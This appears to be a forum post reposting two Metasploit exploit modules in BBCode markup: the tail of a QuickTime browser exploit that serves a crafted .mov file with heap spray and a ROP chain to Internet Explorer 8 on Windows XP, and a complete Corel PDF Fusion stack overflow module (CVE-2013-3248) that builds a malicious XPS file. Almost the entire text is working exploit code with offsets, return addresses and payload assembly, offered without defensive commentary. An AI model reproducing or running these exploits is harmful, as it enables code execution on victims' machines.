	if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return true[/size][/font][/color][color=#000000][font=monospace][size=3]
	elsif agent =~ /contype/[/size][/font][/color][color=#000000][font=monospace][size=3]
	 # contype: a mov file request from Apple Quicktime[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return true[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	false[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]

[color=#000000][font=monospace][size=3]
def get_html(t)[/size][/font][/color][color=#000000][font=monospace][size=3]
	js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))[/size][/font][/color][color=#000000][font=monospace][size=3]
	fake_mov_name = rand_text_alpha(4) + ".mov"[/size][/font][/color][color=#000000][font=monospace][size=3]
	html = %Q|[/size][/font][/color][color=#000000][font=monospace][size=3]
	<html>[/size][/font][/color][color=#000000][font=monospace][size=3]
	<head>[/size][/font][/color][color=#000000][font=monospace][size=3]
	<script>[/size][/font][/color][color=#000000][font=monospace][size=3]
	#{js_property_spray}[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	var s = unescape("#{js_p}");[/size][/font][/color][color=#000000][font=monospace][size=3]
	sprayHeap({shellcode:s});[/size][/font][/color][color=#000000][font=monospace][size=3]
	</script>[/size][/font][/color][color=#000000][font=monospace][size=3]
	</head>[/size][/font][/color][color=#000000][font=monospace][size=3]
	<body>[/size][/font][/color][color=#000000][font=monospace][size=3]
	<embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>[/size][/font][/color][color=#000000][font=monospace][size=3]
	</body>[/size][/font][/color][color=#000000][font=monospace][size=3]
	</html>[/size][/font][/color][color=#000000][font=monospace][size=3]
	|[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	html.gsub(/^\t\t/, '')[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]

[color=#000000][font=monospace][size=3]
def on_request_uri(cli, request)[/size][/font][/color][color=#000000][font=monospace][size=3]
	agent = request.headers['User-Agent'][/size][/font][/color][color=#000000][font=monospace][size=3]
	print_status("Requesting: #{request.uri}")[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	unless targetable?(agent)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 print_error("Browser not supported, sending 404: #{agent}")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 send_not_found(cli)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	print_status("Target selected as: #{target.name}") if target[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	if request.uri =~ /\.mov$/[/size][/font][/color][color=#000000][font=monospace][size=3]
	 print_status("Sending specially crafted .mov file")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })[/size][/font][/color][color=#000000][font=monospace][size=3]
	else[/size][/font][/color][color=#000000][font=monospace][size=3]
	 html = get_html(target)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def sort_bytes(data)[/size][/font][/color][color=#000000][font=monospace][size=3]
	data.map { |e| [e].pack('N').scan(/../).reverse.join }.join[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def rop_nop(t)[/size][/font][/color][color=#000000][font=monospace][size=3]
	[t['Nop']].pack('V*')				 # Ret (QuickTime.qts)[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def exploit[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf = ''[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << rand_text_alpha(467)			 # 467 to align the pivot[/size][/font][/color][color=#000000][font=monospace][size=3]
	10.times {[/size][/font][/color][color=#000000][font=monospace][size=3]
	 buf << rop_nop(target)[/size][/font][/color][color=#000000][font=monospace][size=3]
	}[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << [[/size][/font][/color][color=#000000][font=monospace][size=3]
	 target['Pop'],					 # POP ESP; RET (QuickTime.qts)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x20302020						 # Target value for ESP (our ROP payload)[/size][/font][/color][color=#000000][font=monospace][size=3]
	].pack('V*')[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << sort_bytes([target.ret])		 # ADD ESP,280; RET (QuickTime.qts) - pivot[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	# Quicktime File Format Specifications:[/size][/font][/color][color=#000000][font=monospace][size=3]
	# [url="https://developer.apple.com/standards/qtff-2001.pdf"]https://developer.ap...onospace[size=3]
	mov = "\x00\x00\x06\xDF"			 # File size[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "moov"						 # Movie atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xD7"			 # size (1751d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "rmra"						 # Reference Movie atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xCF"			 # size (1743d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "rmda"						 # rmda atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xBF"			 # size (1727d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "rdrf"						 # Data reference atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x00\x00"			 # size set to 0[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "alis"						 # Data reference type: FS alias record[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xAA"			 # Size (1706d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\x61"			 # Size (1633d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(38)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x12"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(81)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\xFF\xFF"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(18)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x08"					 # Size (8d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x08"					 # Size (8d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x26"					 # Size (38d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(38)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x0F\x00\x0E"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "AA"							 # Size (must be invalid)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(12)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x12\x00\x21"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(36)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x0F\x33"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(17)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x02\xF4"					 # Size (756h)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(756)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\xFF\xFF\x00\x00\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << buf[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	@exploit = mov[/size][/font][/color][color=#000000][font=monospace][size=3]
	super[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#006699][font=monospace][size=1][b]end[/b][/size][/font][/color][/code]

Corel PDF Fusion Stack Buffer Overflow Vulnerability

[color=#000000][font=monospace][size=3]##[/size][/font][/color]
[color=#000000][font=monospace][size=3]# This file is part of the Metasploit Framework and may be subject to[/size][/font][/color]
[color=#000000][font=monospace][size=3]# redistribution and commercial restrictions. Please see the Metasploit[/size][/font][/color]
[color=#000000][font=monospace][size=3]# web site for more information on licensing and terms of use.[/size][/font][/color]
[color=#000000][font=monospace][size=3]#   [url="http://metasploit.com/"]http://metasploit.co...ze[/font[/color]
[color=#000000][font=monospace][size=3]##[/size][/font][/color]

[color=#000000][font=monospace][size=3]require 'msf/core'[/size][/font][/color]
[color=#000000][font=monospace][size=3]require 'rex/zip'[/size][/font][/color]


[color=#000000][font=monospace][size=3]class Metasploit3 < Msf::Exploit::Remote[/size][/font][/color]
[color=#000000][font=monospace][size=3]  Rank = NormalRanking[/size][/font][/color]

[color=#000000][font=monospace][size=3]  include Msf::Exploit::FILEFORMAT[/size][/font][/color]
[color=#000000][font=monospace][size=3]  include Msf::Exploit::Remote::Seh[/size][/font][/color]

[color=#000000][font=monospace][size=3]  def initialize(info = {})[/size][/font][/color]
[color=#000000][font=monospace][size=3]	super(update_info(info,[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'Name'		   => 'Corel PDF Fusion Stack Buffer Overflow',[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'Description'	=> %q{[/size][/font][/color]
[color=#000000][font=monospace][size=3]		This module exploits a stack-based buffer overflow vulnerability in version 1.11 of[/size][/font][/color]
[color=#000000][font=monospace][size=3]		Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry[/size][/font][/color]
[color=#000000][font=monospace][size=3]		names. In order for the payload to be executed, an attacker must convince the target[/size][/font][/color]
[color=#000000][font=monospace][size=3]		user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the[/size][/font][/color]
[color=#000000][font=monospace][size=3]		attacker can execute arbitrary code as the target user.[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  },[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'License'		=> MSF_LICENSE,[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'Author'		 =>[/size][/font][/color]
[color=#000000][font=monospace][size=3]		[[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  'Kaveh Ghaemmaghami', # Vulnerability discovery[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  'juan vazquez' # Metasploit module[/size][/font][/color]
[color=#000000][font=monospace][size=3]		],[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'References'	 =>[/size][/font][/color]
[color=#000000][font=monospace][size=3]		[[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  [ 'CVE', '2013-3248' ],[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  [ 'OSVDB', '94933' ],[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  [ 'BID', '61010' ],[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  [ 'URL', '[url="http://secunia.com/advisories/52707/"]http://secunia.com/a...es/52707/[/url]' ][/size][/font][/color]
[color=#000000][font=monospace][size=3]		],[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'Platform'	   => [ 'win' ],[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'Payload'		=>[/size][/font][/color]
[color=#000000][font=monospace][size=3]		{[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  'DisableNops' => true,[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  'Space' => 4000[/size][/font][/color]
[color=#000000][font=monospace][size=3]		},[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'Targets'		=>[/size][/font][/color]
[color=#000000][font=monospace][size=3]		[[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  # Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  # CorelFusion.exe 2.6.2.0[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  # ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates[/size][/font][/color]
[color=#000000][font=monospace][size=3]		  [ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ][/size][/font][/color]
[color=#000000][font=monospace][size=3]		],[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'DisclosureDate' => 'Jul 08 2013',[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  'DefaultTarget'  => 0))[/size][/font][/color]

[color=#000000][font=monospace][size=3]	register_options([/size][/font][/color]
[color=#000000][font=monospace][size=3]	  [[/size][/font][/color]
[color=#000000][font=monospace][size=3]		OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  ], self.class)[/size][/font][/color]

[color=#000000][font=monospace][size=3]  end[/size][/font][/color]


[color=#000000][font=monospace][size=3]  def exploit[/size][/font][/color]
[color=#000000][font=monospace][size=3]	template = [[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "[Content_Types].xml",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "_rels/.rels",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "docProps/thumbnail.jpeg",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "docProps/core.xml",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "FixedDocSeq.fdseq",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "Documents/1/Pages/_rels/1.fpage.rels",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "Documents/1/_rels/FixedDoc.fdoc.rels",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "Documents/1/FixedDoc.fdoc",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "Documents/1/Structure/Fragments/1.frag",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "Documents/1/Structure/DocStructure.struct",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  "Documents/1/Pages/1.fpage",[/size][/font][/color]
[color=#000000][font=monospace][size=3]	][/size][/font][/color]

[color=#000000][font=monospace][size=3]	xps = Rex::Zip::Archive.new[/size][/font][/color]
[color=#000000][font=monospace][size=3]	template.each do |k|[/size][/font][/color]
[color=#000000][font=monospace][size=3]	  xps.add_file(k, rand_text_alpha(10 + rand(20)))[/size][/font][/color]
[color=#000000][font=monospace][size=3]	end[/size][/font][/color]

[color=#000000][font=monospace][size=3]	resources_length = "Resources/".length[/size][/font][/color]
[color=#000000][font=monospace][size=3]	sploit = "Resources/"[/size][/font][/color]
[color=#000000][font=monospace][size=3]	sploit << payload.encoded[/size][/font][/color]
[color=#000000][font=monospace][size=3]	sploit << rand_text(target['Offset'] - sploit.length)[/size][/font][/color]
[color=#000000][font=monospace][size=3]	sploit << generate_seh_record(target.ret)[/size][/font][/color]
[color=#000000][font=monospace][size=3]	sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length[/size][/font][/color]
[color=#000000][font=monospace][size=3]	sploit << rand_text(1500) # Trigger exception[/size][/font][/color]

[color=#000000][font=monospace][size=3]	xps.add_file(sploit, rand_text_alpha(10 + rand(20)))[/size][/font][/color]

[color=#000000][font=monospace][size=3]	print_status("Creating '#{datastore['FILENAME']}' file...")[/size][/font][/color]
[color=#000000][font=monospace][size=3]	file_create(xps.pack)[/size][/font][/color]
[color=#000000][font=monospace][size=3]  end[/size][/font][/color]

[color=#000000][font=monospace][size=3]end

[/size][/font][/color]